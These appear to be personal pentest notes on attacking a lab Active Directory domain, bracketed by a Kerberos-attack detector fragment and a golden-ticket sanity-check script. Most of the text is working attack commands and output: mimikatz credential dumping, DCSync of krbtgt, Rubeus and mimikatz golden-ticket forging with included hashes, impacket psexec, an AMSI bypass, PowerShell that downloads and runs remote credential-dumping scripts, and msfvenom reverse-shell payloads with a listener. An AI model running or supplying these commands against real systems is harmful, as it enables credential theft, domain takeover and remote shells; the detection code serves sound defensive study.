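    failed against many distinct accounts (kerbrute / Rubeus brute pattern)."""
    accounts_by_ip = defaultdict(set)
    for ev in events:
        failed = ev["EventID"] == 4771 or (ev["EventID"] == 4768 and ev.get("Status") in AUTH_FAILURE_STATUS)
        if failed:
            accounts_by_ip[ev["IpAddress"]].add(ev["TargetUserName"])
    return {ip: sorted(users) for ip, users in accounts_by_ip.items()
            if len(users) >= distinct_account_threshold}


if __name__ == "__main__":
    print("kerberoast:", detect_kerberoast(SAMPLE_EVENTS))
    print("asrep:", detect_asrep_roast(SAMPLE_EVENTS))
    print("spray:", detect_password_spray(SAMPLE_EVENTS))
```

Kerberos audit logging (Audit Kerberos Authentication Service and Audit Kerberos Service Ticket Operations) must be enabled on the DCs for these events to exist at all.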
![](https://hackmd.io/_uploads/BJksLJdUh.png)
![](https://hackmd.io/_uploads/HkRKgkdL3.png)
![](https://hackmd.io/_uploads/H1owrJdI2.png)
![](https://hackmd.io/_uploads/Hy0lIJuIh.png)
![](https://hackmd.io/_uploads/ryhNqJdIh.png)

```
[*] Current LUID : 0x16f441

  UserName              : jquerito
  Domain                : BLEACH
  LogonId               : 0x16f441
  UserSID               : S-1-5-21-3777977817-1859332824-490154379-1108
  AuthenticationPackage : Kerberos
  LogonType             : Interactive
  LogonTime             : 02/06/2023 23:48:07
  LogonServer           : PRINCIPAL-BLEAC
  LogonServerDNSDomain  : BLEACH.LOCAL
  UserPrincipalName     : jquerito@BLEACH.local

    ServiceName           : krbtgt/BLEACH.LOCAL
    ServiceRealm          : BLEACH.LOCAL
    UserName              : jquerito
    UserRealm             : BLEACH.LOCAL
    StartTime             : 02/06/2023 23:48:07
    EndTime               : 03/06/2023 9:48:07
    RenewTill             : 09/06/2023 23:48:07
    Flags                 : name_canonicalize, pre_authent, initial, renewable, forwardable
    KeyType               : aes256_cts_hmac_sha1
    Base64(key)           : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
    Base64EncodedTicket   : <base64 ticket omitted>
```

_______________________________________________________________

```
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"

# Windows -> UNIX
ticketConverter.py $ticket.kirbi $ticket.ccache
# UNIX -> Windows
ticketConverter.py $ticket.ccache $ticket.kirbi

# Linux
cat ticket.b64 | base64 -d > ticket.kirbi
# Mac
cat ticket.b64 | base64 -D > ticket.kirbi
# Powershell
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))

msf6 auxiliary(admin/kerberos/inspect_ticket) > run AES_KEY=4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326 TICKET_PATH=/path/to/ticket
```

![](https://hackmd.io/_uploads/SyiHfbO8h.png)

--------------------------------------------------------------------

Differences between KRBTGT (Kerberos Ticket Granting Ticket) and TGT (Ticket Granting Ticket)

KRBTGT (Kerberos Ticket Granting Ticket)

- It is the KDC's service account. The KDC is the Key Distribution Center, which is in charge of issuing all tickets to clients.
- If you impersonate this account and obtain a golden ticket from the KRBTGT, you will be able to obtain any service ticket you desire.

TGT (Ticket Granting Ticket)

- It is a ticket issued by the KDC to a service account, like the SQLService ticket.
- It can only access the service for which the ticket was issued.

```bash
export KRB5CCNAME="TGT_CCACHE_FILE"
getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'
```

```
rubeus.exe asktgt /user:harshitrajpal /password:Password@1
rubeus.exe asktgt /user:harshitrajpal /rc4:64FBAE31CC352FC26AF97CBDEF151E03
rubeus.exe asktgs /user:harshitrajpal /ticket:doIFNDCCBTCgAwIBB...bA== /service:LDAP/dc1.ignite.local
```

# CLASS: ROAD TO GOLDEN TICKET

```
.\Rubeus kerberoast
lsadump::dcsync /domain:bleach.local /user:krbtgt
```

```bash
.\R.exe asktgt /user:Administrador /domain:BLEACH.local /rc4:ADMIN-HASH
```

```bash
.\R.exe asktgs /user:Administrador /ticket:<ticket> /service:cifs/PRINCIPAL-BLEACH.BLEACH.local
klist
dir \\PRINCIPAL-BLEACH.BLEACH.local\c$
```

### DCSYNC

```bash
.\R.exe asktgs /user:Administrador /ticket:<ticket> /service:LDAP/PRINCIPAL-BLEACH.BLEACH.local /ptt
```

## REAL GOLDEN

```
PS C:\Users\jquerito\Documents\mimikatz-master\mimikatz-master\x64> klist

El id. de inicio de sesión actual es 0:0x732f7

Vales almacenados en caché: (1)

#0>     Cliente: hacker @ BLEACH.LOCAL
        Servidor: krbtgt/BLEACH.local @ BLEACH.LOCAL
        Tipo de cifrado de vale Kerberos: AES-256-CTS-HMAC-SHA1-96
        Marcas de vale 0x40e00000 -> forwardable renewable initial pre_authent
        Hora de inicio: 5/27/2024 23:35:20 (local)
        Hora de finalización: 5/28/2024 9:35:20 (local)
        Hora de renovación: 6/3/2024 23:35:20 (local)
        Tipo de clave de sesión: AES-256-CTS-HMAC-SHA1-96
        Marcas de caché: 0x1 -> PRIMARY
        KDC llamado:

PS C:\Users\jquerito\Documents\mimikatz-master\mimikatz-master\x64> C:\Users\jquerito\Documents\R\R\R.exe golden /aes256:636bb5cf3b96c4faf704793c467c6af5836e85ff0bd669d406234e155d802af5 /ldap /user:hacker /ptt
```

# POC THE TICKET

https://www.kitploit.com/2023/04/cmloot-find-interesting-files-stored-on.html

```
.\R.exe asktgt /user:Administrador /domain:BLEACH.local /rc4:fc19a68b44372b3bcf0297e08a28fda8
.\R.exe asktgs /user:Administrador /ticket:<b64-ticket> /service:cifs/PRINCIPAL-BLEACH.BLEACH.local
.\R.exe asktgs /user:Administrador /ticket:<b64-ticket> /service:LDAP/PRINCIPAL-BLEACH.BLEACH.local

PS C:\Users\jquerito\Downloads> dir \\PRINCIPAL-BLEACH.BLEACH.local\c$

-> KRBTGT: 0a6d458c0c48da059c4992b37d77a3ac

mimikatz # kerberos::golden /domain:BLEACH.local /sid: /rc4:8584cfccd24f6a7f49ee56355d41bd30 /user:newAdmin /id:500 /ptt

kerberos::golden /domain:BLEACH.local /sid:S-1-5-21-3777977817-1859332824-490154379 /rc4:0a6d458c0c48da059c4992b37d77a3ac /user:Administrador /id:500 /groups:500,501,513,512,520,518,519 /ticket:gold.kirbi

.\R.exe asktgs /user:Administrador /ticket:golden2.ticket /service:ldap/PRINCIPAL-BLEACH.BLEACH.local /ptt
.\R.exe asktgs /user:Administrador /ticket:golden.ticket /service:cifs/PRINCIPAL-BLEACH.BLEACH.local /ptt
.\R.exe asktgs /user:Administrador /ticket:gold2.kirbi /service:ldap/PRINCIPAL-BLEACH.BLEACH.local /ptt
```

# C MIMI

```
"privilege::debug" "sekurlsa::logonpasswords"
```

![](https://hackmd.io/_uploads/ryqfymaUh.png)

### IMPACKET POC

```
┌──(kali㉿kali)-[~/Documents]
└─$ impacket-getTGT BLEACH.local/Administrador -dc-ip 10.0.9.4 -hashes :fc19a68b44372b3bcf0297e08a28fda8
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Saving ticket in Administrador.ccache

┌──(kali㉿kali)-[~/Documents]
└─$ export KRB5CCNAME=Administrador.ccache

┌──(kali㉿kali)-[~/Documents]
└─$ impacket-psexec -k -no-pass @PRINCIPAL-BLEACH.BLEACH.local
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
```

![](https://hackmd.io/_uploads/SyCrFfpL2.png)

```
diskshadow.exe /s
```

![](https://hackmd.io/_uploads/ByS-K1vO2.png)
![](https://hackmd.io/_uploads/SkqwckDdn.png)

# AD

```
PS C:\Windows\system32> $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Failed") {$f=$e}};$f.SetValue($null,$true)
```

___

gcc-mingw-w64

___

```
PS C:\Windows\system32> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-PowerDump.ps1');
PS C:\Windows\system32> Invoke-PowerDump
```

```
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');"
```

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
```

__

```bash
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.1.45 LPORT=5558 -f exe > shell-x64.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=192.168.137.130 LPORT=9500 > reverse_64bit.dll
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.1.42;set LPORT 5558;run;"
```
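Returning to the golden-ticket material above (the Rubeus dump and the klist listing under REAL GOLDEN): a cached TGT can be sanity-checked against the domain's ticket policy. The script below is an added example, not from the original notes; it parses the Rubeus-style `Key : value` layout and flags a lifetime or renewal window beyond policy, a TGT key type the domain does not issue, or a principal that does not exist in the directory. The sample tickets, the known-user set and the policy values (the AD defaults of 10 hours and 7 days) are assumptions.

```python
"""Sanity check of cached Kerberos TGTs against domain ticket policy.

Added example, not from the original notes. It parses the 'Key : value' layout
Rubeus prints for cached tickets and flags tickets the KDC would not have issued.
The tickets, the known-user set and the policy values below are constructed
assumptions; the policy numbers are the Active Directory defaults.
"""
from datetime import datetime, timedelta

MAX_TGT_LIFETIME = timedelta(hours=10)  # default "Maximum lifetime for user ticket"
MAX_RENEW_WINDOW = timedelta(days=7)    # default "Maximum lifetime for user ticket renewal"
TIME_FORMAT = "%d/%m/%Y %H:%M:%S"       # day-first, as in the Rubeus dump above
DOMAIN_TGT_KEYTYPE = "aes256_cts_hmac_sha1"

# Constructed: accounts assumed to exist in the directory.
KNOWN_USERS = {"jquerito", "Administrador", "alice"}

# Constructed sample dump: a legitimate TGT, a ticket minted with the default
# kerberos::golden settings (RC4 key, 10-year lifetime), and a Rubeus golden
# ticket built with /ldap for a user that does not exist.
SAMPLE_DUMP = """
  ServiceName              :  krbtgt/BLEACH.LOCAL
  UserName                 :  jquerito
  UserRealm                :  BLEACH.LOCAL
  StartTime                :  02/06/2023 23:48:07
  EndTime                  :  03/06/2023 9:48:07
  RenewTill                :  09/06/2023 23:48:07
  KeyType                  :  aes256_cts_hmac_sha1

  ServiceName              :  krbtgt/BLEACH.LOCAL
  UserName                 :  Administrador
  UserRealm                :  BLEACH.LOCAL
  StartTime                :  27/05/2024 23:35:20
  EndTime                  :  25/05/2034 23:35:20
  RenewTill                :  25/05/2034 23:35:20
  KeyType                  :  rc4_hmac

  ServiceName              :  krbtgt/BLEACH.local
  UserName                 :  hacker
  UserRealm                :  BLEACH.LOCAL
  StartTime                :  27/05/2024 23:35:20
  EndTime                  :  28/05/2024 9:35:20
  RenewTill                :  03/06/2024 23:35:20
  KeyType                  :  aes256_cts_hmac_sha1
"""


def parse_tickets(text):
    """Split Rubeus-style output into one dict per ticket (tickets are blank-line separated)."""
    tickets, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                tickets.append(current)
                current = {}
            continue
        if ":" in line:
            key, value = line.split(":", 1)   # values (times) contain ':' themselves
            current[key.strip()] = value.strip()
    if current:
        tickets.append(current)
    return tickets


def check_ticket(ticket, known_users=None, max_lifetime=MAX_TGT_LIFETIME,
                 max_renew=MAX_RENEW_WINDOW, tgt_keytype=DOMAIN_TGT_KEYTYPE):
    """Return the reasons a cached TGT looks forged; an empty list means it fits policy.

    known_users, if given, is the set of accounts that exist in the directory:
    a golden ticket can name a principal the domain never had.
    """
    start = datetime.strptime(ticket["StartTime"], TIME_FORMAT)
    end = datetime.strptime(ticket["EndTime"], TIME_FORMAT)
    renew = datetime.strptime(ticket["RenewTill"], TIME_FORMAT)
    reasons = []
    if end - start > max_lifetime:
        reasons.append(f"lifetime {end - start} exceeds policy {max_lifetime}")
    if renew - start > max_renew:
        reasons.append(f"renew window {renew - start} exceeds policy {max_renew}")
    if ticket.get("KeyType") != tgt_keytype:
        reasons.append(f"TGT key type {ticket.get('KeyType')} differs from the domain's {tgt_keytype}")
    if known_users is not None and ticket.get("UserName") not in known_users:
        reasons.append(f"no account named {ticket.get('UserName')} in the directory")
    return reasons


def suspicious_tickets(text, known_users=None):
    """Map UserName -> reasons for every ticket in the dump that fails a check."""
    result = {}
    for ticket in parse_tickets(text):
        reasons = check_ticket(ticket, known_users)
        if reasons:
            result[ticket["UserName"]] = reasons
    return result


if __name__ == "__main__":
    for user, reasons in suspicious_tickets(SAMPLE_DUMP, KNOWN_USERS).items():
        print(user, "->", "; ".join(reasons))
```

The third sample mirrors the `/ldap` golden ticket in the klist output: Rubeus read the real policy, so only the unknown-user check catches it, and on a DC this should be paired with looking for 4769 service-ticket requests from accounts that never produced a matching 4768 TGT request.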